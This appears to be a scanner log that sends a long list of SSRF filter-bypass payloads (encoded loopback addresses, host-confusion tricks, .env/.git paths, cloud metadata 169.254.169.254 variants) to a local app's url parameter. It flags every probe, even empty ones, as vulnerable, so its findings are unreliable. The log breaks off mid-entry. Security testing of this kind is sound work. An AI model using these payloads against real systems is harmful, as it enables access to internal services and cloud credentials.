⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Funits` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fusers` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fusers` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2F.env` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2F.env` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2F.git` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2F.git` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A443` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A22` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0` _(POST)_ +- Testing: `http://localhost:4200/?url=0.0.0.0%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0.0.0.0%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A25%2F%20SMTP` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A25%2F%20SMTP` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128%2F%20Squid` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A3128%2F%20Squid` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0000%3A%3A1%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0000%3A%3A1%5D%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` _(POST)_ +- Testing: `http://localhost:4200/?url=127.127.127.127` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.127.127.127` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.1.3` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.1.3` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.0` _(POST)_ +- Testing: `http://localhost:4200/?url=2130706433` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=2130706433` _(POST)_ +- Testing: `http://localhost:4200/?url=017700000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=017700000001` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f000001` _(POST)_ +- Testing: `http://localhost:4200/?url=google.com%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=google.com%40127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%23google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%23google.com` _(POST)_ +- Testing: `http://localhost:4200/?url=google.com.127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=google.com.127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2Fgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3Dgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3Dgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=google.com%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=google.com%40127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%23google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%23google.com` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=google.com.127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=google.com.127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2Fgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3Dgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%3Fd%3Dgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=google.com%40localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=google.com%40localhost` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%23google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%23google.com` _(POST)_ +- Testing: `http://localhost:4200/?url=google.com.localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=google.com.localhost` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%2Fgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%2F%3Fd%3Dgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%2F%3Fd%3Dgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2500google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2500google.com` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3Fgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%2F%2Fgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2500google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2500google.com` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3Fgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%2F%2Fgoogle.com` _(POST)_ +- Testing: `http://localhost:4200/?url=localtest.me` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localtest.me` _(POST)_ +- Testing: `http://localhost:4200/?url=http%3A%400%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=http%3A%400%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%5D%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=127%E3%80%820%E3%80%820%E3%80%821` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127%E3%80%820%E3%80%820%E3%80%821` _(POST)_ +- Testing: `http://localhost:4200/?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` _(POST)_ +- Testing: `http://localhost:4200/?url=2130706433%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=2130706433%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=3232235521%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=3232235521%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=3232235777%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=3232235777%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=0177.0000.0000.0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0177.0000.0000.0001` _(POST)_ +- Testing: `http://localhost:4200/?url=00000177.00000000.00000000.00000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=00000177.00000000.00000000.00000001` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f000001%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f000001%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=0xc0a80014%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0xc0a80014%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f.0x00.0x00.0x01` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f.0x00.0x00.0x01` _(POST)_ +- Testing: `http://localhost:4200/?url=0x0000007f.0x00000000.0x00000000.0x00000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x0000007f.0x00000000.0x00000000.0x00000001` _(POST)_ +- Testing: `http://localhost:4200/?url=127.000000000000.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.000000000000.1` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A%2B11211aaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A%2B11211aaa` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A00011211aaaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A00011211aaaa` _(POST)_ +- Testing: `http://localhost:4200/?url=0%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=localtest.me` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localtest.me` _(POST)_ +- Testing: `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=mail.ebc.apple.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=mail.ebc.apple.com` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` _(POST)_ +- Testing: `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=bugbounty.dod.network` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=bugbounty.dod.network` _(POST)_ +- Testing: `http://localhost:4200/?url=1ynrnhl.xip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=1ynrnhl.xip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=spoofed.burpcollaborator.net` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=spoofed.burpcollaborator.net` _(POST)_ +- Testing: `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` _(POST)_ +- Testing: `http://localhost:4200/?url=spoofed.burpcollaborator.net` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=spoofed.burpcollaborator.net` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.1.3` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.1.3` _(POST)_ +- Testing: `http://localhost:4200/?url=0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost` _(POST)_ +- Testing: `http://localhost:4200/?url=1.0.0.127.in-addr.arpa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=1.0.0.127.in-addr.arpa` _(POST)_ +- Testing: `http://localhost:4200/?url=01111111000000000000000000000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=01111111000000000000000000000001` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f.0x0.0x0.0x1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f.0x0.0x0.0x1` _(POST)_ +- Testing: `http://localhost:4200/?url=0177.0.0.01` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0177.0.0.01` _(POST)_ +- Testing: `http://localhost:4200/?url=7F000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=7F000001` _(POST)_ +- Testing: `http://localhost:4200/?url=2130706433` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=2130706433` _(POST)_ +- Testing: `http://localhost:4200/?url=6425673729` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=6425673729` _(POST)_ +- Testing: `http://localhost:4200/?url=127001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127001` _(POST)_ +- Testing: `http://localhost:4200/?url=127_0._0_1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127_0._0_1` _(POST)_ +- Testing: `http://localhost:4200/?url=0000%3A%3A1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000%3A%3A1` _(POST)_ +- Testing: `http://localhost:4200/?url=0000%3A%3A1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000%3A%3A1%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%3A%3Affff%3A7f00%3A0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%3A%3Affff%3A7f00%3A0001` _(POST)_ +- Testing: `http://localhost:4200/?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` _(POST)_ +- Testing: `http://localhost:4200/?url=localtest.me` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localtest.me` _(POST)_ +- Testing: `http://localhost:4200/?url=bugbounty.dod.network` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=bugbounty.dod.network` _(POST)_ +- Testing: `http://localhost:4200/?url=127.127.127.127` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.127.127.127` _(POST)_ +- Testing: `http://localhost:4200/?url=0177.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0177.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=whitelisted%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=whitelisted%40127.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f000001` _(POST)_ +- Testing: `http://localhost:4200/?url=017700000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=017700000001` _(POST)_ +- Testing: `http://localhost:4200/?url=0177.00.00.01` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0177.00.00.01` _(POST)_ +- Testing: `http://localhost:4200/?url=0000.0000.0000.0000` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0000.0000.0000.0000` _(POST)_ +- Testing: `http://localhost:4200/?url=0177.0000.0000.0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0177.0000.0000.0001` _(POST)_ +- Testing: `http://localhost:4200/?url=0177.0001.0000..0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0177.0001.0000..0001` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f.0x1.0x0.0x1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f.0x1.0x0.0x1` _(POST)_ +- Testing: `http://localhost:4200/?url=0x7f.0x1.0x1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0x7f.0x1.0x1` _(POST)_ +- Testing: `http://localhost:4200/?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A%2B11211aaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A%2B11211aaa` _(POST)_ +- Testing: `http://localhost:4200/?url=loopback%3A00011211aaaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=loopback%3A00011211aaaa` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254` _(POST)_ +- Testing: `http://localhost:4200/?url=2852039166` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=2852039166` _(POST)_ +- Testing: `http://localhost:4200/?url=7147006462` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=7147006462` _(POST)_ +- Testing: `http://localhost:4200/?url=0xa9.0xfe.0xa9.0xfe` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0xa9.0xfe.0xa9.0xfe` _(POST)_ +- Testing: `http://localhost:4200/?url=0251.0376.0251.0376` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0251.0376.0251.0376` _(POST)_ +- Testing: `http://localhost:4200/?url=169%E3%80%82254%E3%80%82169%E3%80%82254` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169%E3%80%82254%E3%80%82169%E3%80%82254` _(POST)_ +- Testing: `http://localhost:4200/?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` _(POST)_ +- Testing: `http://localhost:4200/?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` + ⚠️ - **Possible SSRF vulnerability at:** 